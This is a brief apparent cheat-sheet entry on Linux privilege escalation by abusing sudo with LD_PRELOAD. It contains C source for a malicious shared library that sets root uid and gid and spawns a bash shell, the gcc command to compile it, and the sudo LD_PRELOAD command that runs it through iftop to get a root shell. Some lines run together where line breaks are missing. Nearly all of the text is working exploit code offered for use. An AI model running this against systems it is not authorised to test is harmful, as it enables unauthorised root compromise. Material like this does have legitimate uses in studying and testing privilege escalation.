LD_PRELOAD
sudo -l
Last updated
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}gcc -fPIC -shared -o shell.so shell.c -nostartfilessudo LD_PRELOAD=/tmp/shell.so iftop